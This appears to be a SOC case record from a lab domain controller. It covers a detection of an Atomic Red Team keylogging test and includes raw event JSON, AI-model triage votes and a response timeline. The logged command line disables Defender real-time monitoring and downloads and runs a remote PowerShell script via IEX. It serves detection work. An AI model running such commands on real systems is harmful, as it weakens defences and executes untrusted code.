Severity: high · Status: closed · Verdict: suspicious

๐Ÿท๏ธ Analyst Verdict Classification

SUSPICIOUS by analyst

🤖 AI Analysis

🔔 Detections (1)

Malicious PowerShell Commandlets - ProcessCreation high
Rule: managed.Malicious PowerShell Commandlets - ProcessCreation
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 88% · Verdict: suspicious
Event Data:
COMMAND_LINE:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path \""C:\AtomicRedTeam\atomics\T1056.001\src\Get-Keystrokes.ps1\"") {exit 0} else {exit 1}}
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
40960
PARENT:
{'BASE_ADDRESS': 140694944940032, 'COMMAND_LINE': "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ", 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', 'HASH': 'de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c', 'MEMORY_USAGE': 193449984, 'PARENT_ATOM': '0c13305cb3f73d15515e789969c2a835', 'PARENT_PROCESS_ID': 2440, 'PROCESS_ID': 3164, 'THIS_ATOM': '6b593eddb775332b5050941f69c2a838', 'THREADS': 32, 'TIMESTAMP': 1774364726507, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
3164
PROCESS_ID:
7520
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs: {'type': 'command_line', 'value': '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" & {if (Test-Path \\"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\\") {exit 0} else {exit 1}}'} {'type': 'file_path', 'value': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'}
MITRE: T1056.001 T1567.001 T1563.002
Analyst Declaration:
📄 Raw Detection JSON
{
  "author": "_ext-snapattack-bef4337c-2507-4428-bce6-8021ba80d7c4[bulk][segment]",
  "cat": "Malicious PowerShell Commandlets - ProcessCreation",
  "detect": {
    "event": {
      "COMMAND_LINE": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \u0026 {if (Test-Path \\\"\"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\\\"\") {exit 0} else {exit 1}} ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 40960,
      "PARENT": {
        "BASE_ADDRESS": 140694944940032,
        "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
        "MEMORY_USAGE": 193449984,
        "PARENT_ATOM": "0c13305cb3f73d15515e789969c2a835",
        "PARENT_PROCESS_ID": 2440,
        "PROCESS_ID": 3164,
        "THIS_ATOM": "6b593eddb775332b5050941f69c2a838",
        "THREADS": 32,
        "TIMESTAMP": 1774364726507,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 3164,
      "PROCESS_ID": 7520,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "f886ac72-7b91-43db-9f5e-1ef21be158c9",
      "event_time": 1774364762965,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 1318,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "6b593eddb775332b5050941f69c2a838",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "fd518bcba64488e9b505f45c69c2a85b"
    }
  },
  "detect_id": "d403600d-5267-4c9b-8271-3f4169c2a85c",
  "detect_mtd": {
    "author": "Nasreddine Bencherchali (Nextron Systems)",
    "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks",
    "falsepositives": [
      "Unknown"
    ],
    "level": "high",
    "references": [
      "https://adsecurity.org/?p=2921",
      "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
      "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
      "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
      "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
      "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
      "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
      "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
      "https://github.com/calebstewart/CVE-2021-1675",
      "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
      "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
      "https://github.com/HarmJ0y/DAMP",
      "https://github.com/samratashok/nishang",
      "https://github.com/DarkCoderSc/PowerRunAsSystem/",
      "https://github.com/besimorhino/powercat",
      "https://github.com/Kevin-Robertson/Powermad",
      "https://github.com/adrecon/ADRecon",
      "https://github.com/adrecon/AzureADRecon",
      "https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1"
    ],
    "snapattack_analytic_guid": "d48d9380-c5ae-495a-9274-c5fbdeb10e15",
    "tags": [
      "attack.execution",
      "attack.discovery",
      "attack.t1482",
      "attack.t1087",
      "attack.t1087.001",
      "attack.t1087.002",
      "attack.t1069.001",
      "attack.t1069.002",
      "attack.t1069",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364764284,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364762\u0026selected=fd518bcba64488e9b505f45c69c2a85b",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "f886ac72-7b91-43db-9f5e-1ef21be158c9",
    "event_time": 1774364762965,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 1318,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "6b593eddb775332b5050941f69c2a838",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "fd518bcba64488e9b505f45c69c2a85b"
  },
  "rule_tags": [
    "ext:ext-snapattack",
    "attack.execution",
    "attack.discovery",
    "attack.t1482",
    "attack.t1087",
    "attack.t1087.001",
    "attack.t1087.002",
    "attack.t1069.001",
    "attack.t1069.002",
    "attack.t1069",
    "attack.t1059.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "managed.Malicious PowerShell Commandlets - ProcessCreation",
  "ts": 1774364764000
}
🌐 Threat Intel JSON
{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}
🤖 Triage JSON
{
  "confidence": 0.875,
  "false_positive_reason": null,
  "investigation_questions": [
    "What triggered the execution of these commands?",
    "Are there other processes running in the same process tree?",
    "Has the host been accessed remotely recently?"
  ],
  "ioc_analysis": "The file path C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is a known-good system binary, which initially suggests benignity. However, the command line arguments reveal execution of ART\u0027s T1056.001 (Keylogging) test suite and commands to disable real-time monitoring via Set-MpPreference. The hash matches the legitimate powershell.exe binary, but the context of execution is malicious.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \u0026 {if (Test-Path \\\"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\\\") {exit 0} else {exit 1}}"
    },
    {
      "type": "file_path",
      "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    }
  ],
  "mitre_techniques": [
    "T1056.001",
    "T1567.001",
    "T1563.002"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host immediately to prevent credential theft or further lateral movement.",
    "Review recent authentication logs for SYSTEM account activity.",
    "Check for persistence mechanisms installed by ART tools.",
    "Analyze network traffic for outbound connections from this session."
  ],
  "risk_score": 90,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of Atomic Red Team (ART) automation scripts under SYSTEM privileges. The process is running legitimate PowerShell but executing commands designed to test for credential harvesting and disable security controls.\n\n**IOC Analysis:** The file path C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is a known-good system binary, which initially suggests benignity. However, the command line arguments reveal execution of ART\u0027s T1056.001 (Keylogging) test suite and commands to disable real-time monitoring via Set-MpPreference. The hash matches the legitimate powershell.exe binary, but the context of execution is malicious.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.8\nThe detection event involves a PowerShell process running as the SYSTEM account with a suspicious command line that checks for and potentially executes a script from Atomic Red Team, a tool often used in attack simulations. While the process itself is legitimate and signed, the commands indicate malicious intent, such as installing packages and running attack tests.\n\n**IOC Analysis:** The FILE_PATH points to a legitimate Microsoft-signed PowerShell executable in the System32 directory, which is generally benign. However, the HASH is valid for a signed binary, but the COMMAND_LINE contains suspicious elements like installing NuGet and downloading scripts from GitHub, which are common in malicious activities. The parent process also shows similar suspicious behavior, raising concerns.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 80% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.8,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}

⚙️ Response Actions

Action | Target | Status | Result
tag | e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
recommended | Manual analyst review required — AI models (split) | executed | General Activity Sweep: 0 events found
recommended | Isolate the host immediately to prevent credential theft or further lateral movement. | executed | Lateral Movement Investigation: 50 events found
recommended | Review recent authentication logs for SYSTEM account activity. | executed | General Activity Sweep: 0 events found
recommended | Check for persistence mechanisms installed by ART tools. | executed | Persistence Check: 0 events found
recommended | Analyze network traffic for outbound connections from this session. | executed | Network Activity Investigation: 50 events found


💬 Notes (6)

🤖 FusionSOC AI 2026-03-24T15:41

📜 Timeline

2026-03-24T16:06:27
analyst
Status changed: investigating → closed
2026-03-24T16:06:25
analyst
Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T15:41:07
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T15:41:07
FusionSOC
Action recommended → executed: Network Activity Investigation: 50 events found
2026-03-24T15:41:07
FusionSOC AI
Note by FusionSOC AI: ## 🔍 Network Activity Investigation **Action:** Analyze network traffic for outbound connections from this session. **Se...
2026-03-24T15:41:06
FusionSOC
Response action queued: recommended on Analyze network traffic for outbound connections from this session.
2026-03-24T15:41:06
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T15:41:06
FusionSOC
Action recommended → executed: Persistence Check: 0 events found
2026-03-24T15:41:06
FusionSOC AI
Note by FusionSOC AI: ## 🔍 Persistence Check **Action:** Check for persistence mechanisms installed by ART tools. **Sensor:** `e4a1c62d-4d1f-4...
2026-03-24T15:41:05
FusionSOC
Response action queued: recommended on Check for persistence mechanisms installed by ART tools.
2026-03-24T15:41:05
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T15:41:05
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T15:41:05
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Review recent authentication logs for SYSTEM account activity. **Sensor:** `e4a1...
2026-03-24T15:41:05
FusionSOC
Response action queued: recommended on Review recent authentication logs for SYSTEM account activity.
2026-03-24T15:41:05
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T15:41:05
FusionSOC
Action recommended → executed: Lateral Movement Investigation: 50 events found
2026-03-24T15:41:05
FusionSOC AI
Note by FusionSOC AI: ## 🔍 Lateral Movement Investigation **Action:** Isolate the host immediately to prevent credential theft or further late...
2026-03-24T15:41:04
FusionSOC
Response action queued: recommended on Isolate the host immediately to prevent credential theft or further lateral movement.
2026-03-24T15:41:04
FusionSOC AI
Status changed: open → investigating
2026-03-24T15:41:04
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T15:41:04
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Manual analyst review required — AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T15:41:03
FusionSOC
Response action queued: recommended on Manual analyst review required — AI models (split)
2026-03-24T15:41:03
FusionSOC
Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T15:41:03
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T15:41:03
FusionSOC AI
Detection d403600d-5267-4c9b-8271-3f4169c2a85c triaged as suspicious (high severity, confidence: 88%)
2026-03-24T15:41:03
FusionSOC AI
Case created from detection: managed.Malicious PowerShell Commandlets - ProcessCreation